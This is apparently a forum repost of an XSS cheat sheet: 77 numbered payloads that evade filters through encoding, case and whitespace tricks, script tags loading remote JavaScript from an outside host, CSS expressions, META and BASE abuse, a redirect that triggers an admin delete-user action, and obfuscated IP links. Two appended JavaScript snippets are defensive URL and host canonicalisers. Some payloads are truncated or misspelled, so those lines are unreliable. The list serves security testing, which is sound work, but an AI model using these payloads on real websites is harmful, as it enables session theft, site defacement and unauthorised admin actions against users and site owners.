XSS cross-site scripting attack roundup

Posted on 2012-9-5 14:56:34
There seems to be relatively little XSS material on t00ls, so when I saw something good I copied it over; not sure whether any of you need to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript directive
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolons, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Getting around length limits (requires the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters basically have no effect domestically, because there is nowhere to exploit them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC="   javascript:alert('XSS');">
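
Items 3 through 19 all defeat a filter that inspects the raw attribute string. The checker below is an added example, not part of the original post: it canonicalises an attribute URL the way a browser does (entity decoding with or without semicolons, case folding, dropping embedded tabs, newlines, NULs and leading spaces) and then allow-lists the scheme instead of searching for "javascript:"; the allowed schemes, the named-entity table and the sample inputs are my own assumptions.

```javascript
// Added example, not part of the original post. Items 3-14, 17 and 19 above all
// beat a filter that scans the raw attribute value; a checker must first undo
// what the browser undoes (entity decoding, case, embedded whitespace and NULs)
// and then allow-list the scheme rather than hunt for the string "javascript:".

// Named references that matter for URLs (assumed table); numeric ones are generic.
const NAMED = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", colon: ':', Tab: '\t', NewLine: '\n' };

// Decode &#NN; / &#xNN; with or without the trailing semicolon (items 5, 9, 10).
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (whole, ref) => {
    if (ref[0] !== '#') return Object.prototype.hasOwnProperty.call(NAMED, ref) ? NAMED[ref] : whole;
    const cp = /^#x/i.test(ref) ? parseInt(ref.slice(2), 16) : parseInt(ref.slice(1), 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : whole;
  });
}

// Browsers ignore tab, newline and CR anywhere in a URL and NUL, space and other
// C0 controls at its start (items 11-14, 17, 19); strip the whole 0x00-0x20 range.
function canonicalise(value) {
  return decodeEntities(value).replace(/[\u0000-\u0020]/g, '').toLowerCase();
}

// Allow-list (assumed policy): relative references and http/https/mailto only.
function isSafeUrl(value) {
  const m = canonicalise(value).match(/^([a-z][a-z0-9+.-]*):/);
  return m === null || ['http', 'https', 'mailto'].includes(m[1]);
}

// Constructed sample inputs: payload shapes from the list above plus benign URLs.
const SAMPLES = [
  "JaVaScRiPt:alert('XSS')",
  "jav\tascript:alert('XSS');",
  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29",
  'java\u0000script:alert("XSS")',
  "   javascript:alert('XSS');",
  'vbscript:msgbox("XSS")',
  'http://3w.org/XSS/xss.js',
  '//www.google.com/',
  '/a.jpg',
];

for (const s of SAMPLES) console.log(isSafeUrl(s) ? 'allow' : 'block', JSON.stringify(s));
```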

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (an open angle bracket followed by a letter is enough)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash, you can smuggle your XSS code in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
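
Items 68 through 76 spell the same host several different ways. The following is an added example, not part of the original post: it normalises a link's host the way the WHATWG URL parser does (tab and newline removal, decimal, hex, octal and mixed-radix IPv4 literals, trailing dot, userinfo and port) so that a host allow-list compares canonical forms rather than raw strings; the allowed set is a constructed assumption.

```javascript
// Added example, not part of the original post. Items 68-76 above dress one host
// up as a decimal, hex, octal or mixed-radix IP literal, drop "http:" or "www",
// or add a trailing dot; an allow-list that compares raw strings sees them all as
// different hosts. Normalise the host first, as browsers do, then compare.

// Parse a dotted IPv4 literal in any radix browsers accept. Returns dotted-decimal
// form, or null when the host is not a valid IPv4 literal (treat it as a name).
function parseIPv4(host) {
  const parts = host.split('.');
  if (parts.length > 1 && parts[parts.length - 1] === '') parts.pop(); // trailing dot
  if (parts.length > 4) return null;
  const nums = parts.map((p) => {
    if (/^0x[0-9a-f]*$/i.test(p)) return p.length === 2 ? 0 : parseInt(p.slice(2), 16);
    if (/^0[0-7]+$/.test(p)) return parseInt(p, 8);   // leading zero means octal
    if (/^[0-9]+$/.test(p)) return parseInt(p, 10);
    return NaN;
  });
  if (nums.some(Number.isNaN)) return null;
  const last = nums.pop();
  // The last part fills the remaining bytes: "3232235521" alone is one 32-bit number.
  if (nums.some((n) => n > 255) || last >= 256 ** (4 - nums.length)) return null;
  let addr = last;
  nums.forEach((n, i) => { addr += n * 256 ** (3 - i); });
  return [24, 16, 8, 0].map((shift) => (addr >>> shift) & 255).join('.');
}

// Extract and canonicalise the host of an absolute or scheme-relative URL.
function canonicalHost(url) {
  const cleaned = url.replace(/[\t\n\r]/g, '');   // browsers drop these anywhere
  const m = cleaned.match(/^(?:[a-z][a-z0-9+.-]*:)?\/\/([^\/?#\\]*)/i);
  if (!m) return null;                            // no authority component
  let host = m[1].toLowerCase();
  host = host.slice(host.lastIndexOf('@') + 1);   // drop userinfo
  host = host.replace(/:[0-9]*$/, '');            // drop port
  const ip = parseIPv4(host);
  if (ip) return ip;
  return host.endsWith('.') ? host.slice(0, -1) : host; // absolute DNS name, item 76
}

// Allow-list check against canonical hosts; the allowed set is constructed here.
const ALLOWED = new Set(['www.google.com', 'google.com']);
function isAllowedLink(url) {
  const host = canonicalHost(url);
  return host !== null && ALLOWED.has(host);
}

for (const u of ['http://3232235521/', 'http://0xc0.0xa8.0x00.0x01/', 'http://www.google.com./']) console.log(u, '->', canonicalHost(u), isAllowedLink(u));
```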